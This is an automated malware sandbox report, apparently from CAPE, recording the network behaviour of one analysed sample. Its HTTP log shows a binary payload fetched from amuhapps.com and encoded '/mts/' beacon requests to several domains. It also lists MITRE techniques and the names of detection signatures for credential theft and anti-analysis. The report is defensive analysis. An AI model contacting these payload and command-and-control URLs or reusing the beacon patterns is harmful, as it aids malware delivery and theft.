t7eWWgX5K2_PkqhtImHkb0fWENUESsKhdoU25OhlEdwz9VHANrpH2dfd8sErE19Bt351G3enKZyW2AZQGi6XEWtV2IZ3hd8AzglUgWTYTOPrVw7615YRiEFzoHr6r6uMvaMc5nWdA2ApuuvJCZmpwmORSACTMvm8wVCGKpd6YfyyrT8USAk

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-05 14:12:57.865 192.168.1.7 [VT] 49173 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:57.991 192.168.1.7 [VT] 49174 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:58.026 192.168.1.7 [VT] 49175 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:58.114 192.168.1.7 [VT] 49176 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:58.249 192.168.1.7 [VT] 49177 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-05 14:12:57.978 192.168.1.7 [VT] 49173 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:12:58.004 192.168.1.7 [VT] 49174 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:12:58.293 192.168.1.7 [VT] 49175 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:12:58.298 192.168.1.7 [VT] 49176 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:12:58.334 192.168.1.7 [VT] 49177 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:13:58.151 192.168.1.7 [VT] 49190 52.114.133.61 [VT] 443 CN=*.events.data.microsoft.com 1a:c2:39:ff:84:fe:1a:c9:81:f5:45:9a:d0:a0:f2:66:d1:8c:38:c9 TLS 1.2

Suricata HTTP

Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-05 14:13:17.834 192.168.1.7 [VT] 49188 67.217.34.88 [VT] 80 200 amuhapps.com [VT] /a1/bin_WHDqrJTtDa208.bin application/octet-stream Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko None 183360
2020-06-05 14:13:52.488 192.168.1.7 [VT] 49189 23.20.239.12 [VT] 80 None www.parkwayautogroup.com [VT] /mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN None None None 0
2020-06-05 14:13:59.794 192.168.1.7 [VT] 49191 95.101.78.106 [VT] 80 200 ctldl.windowsupdate.com [VT] /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?086df30af318f8f6 application/vnd.ms-cab-compressed Microsoft-CryptoAPI/6.1 None 6894
2020-06-05 14:14:00.836 192.168.1.7 [VT] 49192 93.184.220.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:14:37.715 192.168.1.7 [VT] 49193 63.250.37.110 [VT] 80 404 www.vinoblay.com [VT] /mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN text/html None None 327
2020-06-05 14:14:40.209 192.168.1.7 [VT] 49194 63.250.37.110 [VT] 80 None www.vinoblay.com [VT] /mts/ None Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko http://www.vinoblay.com/mts/ 0
2020-06-05 14:14:57.629 192.168.1.7 [VT] 49195 188.165.53.185 [VT] 80 None www.esprit-de-connaisseur.com [VT] /mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN None None None 0
2020-06-05 14:14:59.637 192.168.1.7 [VT] 49196 188.165.53.185 [VT] 80 None www.esprit-de-connaisseur.com [VT] /mts/ None Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko http://www.esprit-de-connaisseur.com/mts/ 0
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.7 49173 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49174 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49175 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49176 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49177 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49190 52.114.133.61 443 d124ae14809abde3528a479fe01a12bd unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.
Defense Evasion Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 9.596000000000002 seconds )

    • 5.206 Suricata
    • 2.476 NetworkAnalysis
    • 1.047 VirusTotal
    • 0.518 CAPE
    • 0.136 BehaviorAnalysis
    • 0.135 Static
    • 0.03 Deduplicate
    • 0.02 AnalysisInfo
    • 0.012 TargetInfo
    • 0.005 Debug
    • 0.004 Dropped
    • 0.004 peid
    • 0.003 Strings

    Signatures ( 0.21800000000000008 seconds )

    • 0.044 antiav_detectreg
    • 0.017 infostealer_ftp
    • 0.016 territorial_disputes_sigs
    • 0.012 ransomware_files
    • 0.01 infostealer_im
    • 0.009 antianalysis_detectreg
    • 0.008 ransomware_extensions
    • 0.007 network_cnc_http
    • 0.006 antiav_detectfile
    • 0.005 antidbg_windows
    • 0.005 persistence_autorun
    • 0.005 antivm_vbox_keys
    • 0.005 infostealer_mail
    • 0.004 antianalysis_detectfile
    • 0.004 modify_proxy
    • 0.004 infostealer_bitcoin
    • 0.003 api_spamming
    • 0.003 decoy_document
    • 0.003 antivm_vmware_keys
    • 0.003 masquerade_process_name
    • 0.003 network_torgateway
    • 0.002 kibex_behavior
    • 0.002 NewtWire Behavior
    • 0.002 antivm_parallels_keys
    • 0.002 antivm_vbox_files
    • 0.002 antivm_xen_keys
    • 0.002 geodo_banking_trojan
    • 0.002 browser_security
    • 0.002 disables_browser_warn
    • 0.002 network_dns_opennic
    • 0.002 network_http
    • 0.002 recon_checkip
    • 0.001 InjectionCreateRemoteThread
    • 0.001 antiemu_wine_func
    • 0.001 antivm_generic_disk
    • 0.001 antivm_vbox_libs
    • 0.001 betabot_behavior
    • 0.001 dynamic_function_loading
    • 0.001 exec_crash
    • 0.001 hawkeye_behavior
    • 0.001 malicious_dynamic_function_loading
    • 0.001 mimics_filetime
    • 0.001 stealth_timeout
    • 0.001 tinba_behavior
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_diskreg
    • 0.001 antivm_vpc_keys
    • 0.001 ketrican_regkeys
    • 0.001 network_dns_blockchain
    • 0.001 revil_mutexes
    • 0.001 limerat_regkeys
    • 0.001 recon_fingerprint

    Reporting ( 6.771 seconds )

    • 6.351 BinGraph
    • 0.359 MITRE_TTPS
    • 0.061 PCAP2CERT